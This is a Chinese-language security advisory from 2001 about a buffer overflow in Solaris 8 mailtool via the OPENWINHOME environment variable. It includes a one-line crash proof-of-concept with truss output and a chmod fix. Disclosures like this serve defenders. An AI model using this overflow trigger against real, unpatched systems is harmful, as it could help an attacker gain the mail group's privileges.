Solaris mailtool(1) 存在缓冲溢出漏洞

发布时间：2001-05-29
更新时间：2001-05-29
严重程度：高
威胁程度：权限提升
错误类型：输入验证错误
利用方式：服务器模式

受影响系统

Solaris 8 x86
Solaris 8 sparc

详细描述
Solaris下的mailtool工具以mail的setgid 权利默认安装，其中在处理
环境变量OPENWINHOME 的时候存在缓冲溢出，导致以mail gid命令执行
任意命令。

测试代码
bash-2.03# export OPENWINHOME=`perl -e 'print "A"x1010'`
bash-2.03# mailtool
Segmentation Fault

`truss` output:
    Incurred fault #6, FLTBOUNDS %pc = 0xDF8BD448
    siginfo: SIGSEGV SEGV_MAPERR addr=0x4141414D
    Received signal #11, SIGSEGV [default]
    siginfo: SIGSEGV SEGV_MAPERR addr=0x4141414D
    *** process killed ***

解决方案
chmod -s `which mailtool`

相关信息
dethy@synnergy.net

最近严重漏洞

Solaris mailtool(1) 存在缓冲溢出漏洞